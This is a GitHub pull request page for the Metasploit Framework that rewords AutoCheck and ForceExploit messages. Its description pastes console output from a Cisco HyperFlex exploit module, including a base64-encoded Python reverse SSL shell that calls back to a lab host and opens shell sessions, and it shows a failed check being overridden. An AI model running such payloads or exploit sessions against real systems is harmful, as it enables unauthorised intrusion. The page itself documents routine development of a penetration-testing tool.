Improve AutoCheck user experience (prints, etc.) #15399

Merged: 3 commits, Jul 7, 2021

Contributor

@wvu wvu commented Jul 7, 2021

Words are hard. If I break master, I'll fix it. (:

msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Storfs ASUP servlet detected.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCldhPUZhbHNlCndoaWxlIG5vdCBXYToKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJV2EgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55064) at 2021-07-06 21:38:27 -0500
[!] Command execution timed out

^C
Abort session 1? [y/N]  y

[*] 172.16.57.4 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck false
AutoCheck => false
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('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')[0]))"
[*] Command shell session 2 opened (172.16.57.1:4444 -> 172.16.57.4:55068) at 2021-07-06 21:38:37 -0500
[!] Command execution timed out

^C
Abort session 2? [y/N]  y

[*] 172.16.57.4 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck true
AutoCheck => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > edit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('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')[0]))"
[*] Command shell session 3 opened (172.16.57.1:4444 -> 172.16.57.4:55076) at 2021-07-06 21:39:06 -0500
[!] Command execution timed out

Fixes #12853. For #15398.

@wvu wvu added library bug rn-no-release-notes no release notes code quality Improving code quality labels Jul 7, 2021
@wvu wvu requested a review from adfoster-r7 July 7, 2021 02:46
@wvu wvu self-assigned this Jul 7, 2021
end

def initialize(info = {})
super

register_advanced_options([
OptBool.new('AutoCheck', [false, 'Run check before exploitation', true]),
OptBool.new('AutoCheck', [false, 'Run check before exploit', true]),
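
Review bot: The new AutoCheck description, 'Run check before exploit', does not say what a failed check does. The option defaults to true and, per the fail_with call in with_prepended_auto_check further down this diff, a not-vulnerable result aborts the run, so it would help to point at the override here, for example 'Run check before exploit (see ForceExploit)'.
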
Contributor Author

This sounds grammatically more natural in the context of an exploit.

@@ -36,10 +36,10 @@ def with_prepended_auto_check
return yield
end

print_status('Executing automatic check (disable AutoCheck to override)')
print_status('Running automatic check ("set AutoCheck false" to disable)')
Contributor Author

This is more consistent with the option description and behavior (and avoids semantic satiation). Also adds a handy example.


warning_msg = 'ForceExploit is enabled, proceeding with exploitation.'
error_msg = 'Enable ForceExploit to override check result.'
error_msg = '"set ForceExploit true" to override check result.'
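
Review bot: The new error_msg line is a sentence fragment that opens with a quoted command, and it is appended directly after checkcode.message, so the failure line in the PR description reads: The target is not exploitable. "set ForceExploit true" to override check result. Consider giving it a verb, for example 'Run "set ForceExploit true" to override the check result.', or using the same parenthesised hint form as the new print_status line so both hints read the same way.
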
Contributor Author

Handy example++.

@@ -54,8 +54,7 @@ def with_prepended_auto_check
return yield
end

fail_with(Module::Failure::NotVulnerable,
"#{checkcode.message} #{error_msg}")
fail_with(Module::Failure::NotVulnerable, "#{checkcode.message} #{error_msg}")
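
Review bot: The one-line fail_with joins checkcode.message and error_msg with a bare space, which only reads correctly when checkcode.message already ends in sentence punctuation. Nothing in this hunk guarantees that, so a check code whose message lacks a trailing period would run straight into the override hint; consider normalising the punctuation before joining, or documenting the expectation where the message is built.
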
Contributor Author

80 columns be damned.

@wvu wvu merged commit 5d01912 into rapid7:master Jul 7, 2021
@wvu wvu deleted the bug/autocheck branch July 7, 2021 03:21
Contributor

@adfoster-r7 adfoster-r7 left a comment

:shipit:
